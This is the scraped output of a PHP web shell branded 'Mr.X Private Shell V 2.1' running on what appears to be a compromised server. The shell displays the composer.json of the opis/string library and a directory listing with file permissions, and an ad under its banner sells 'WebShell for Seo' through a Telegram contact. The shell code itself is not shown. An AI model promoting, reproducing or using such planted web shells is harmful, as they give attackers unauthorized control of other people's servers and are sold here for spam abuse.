__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{
"name": "opis/string",
"description": "Multibyte strings as objects",
"keywords": ["opis", "string", "utf-8", "multi-byte", "string manipulation"],
"homepage": "https://opis.io/string",
"license": "Apache-2.0",
"authors": [
{
"name": "Marius Sarca",
"email": "[email protected]"
},
{
"name": "Sorin Sarca",
"email": "[email protected]"
}
],
"require": {
"php": "^7.4 || ^8.0",
"ext-json": "*",
"ext-iconv": "*"
},
"require-dev": {
"phpunit/phpunit": "^9.0"
},
"autoload": {
"psr-4": {
"Opis\\String\\": "src/"
}
},
"autoload-dev": {
"psr-4": {
"Opis\\String\\Test\\": "tests/"
}
},
"scripts": {
"tests": "./vendor/bin/phpunit --verbose --color"
},
"extra": {
"branch-alias": {
"dev-master": "2.x-dev"
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| res | Folder | 0775 |
|
|
| src | Folder | 0775 |
|
|
| LICENSE | File | 9.93 KB | 0664 |
|
| NOTICE | File | 306 B | 0664 |
|
| composer.json | File | 994 B | 0664 |
|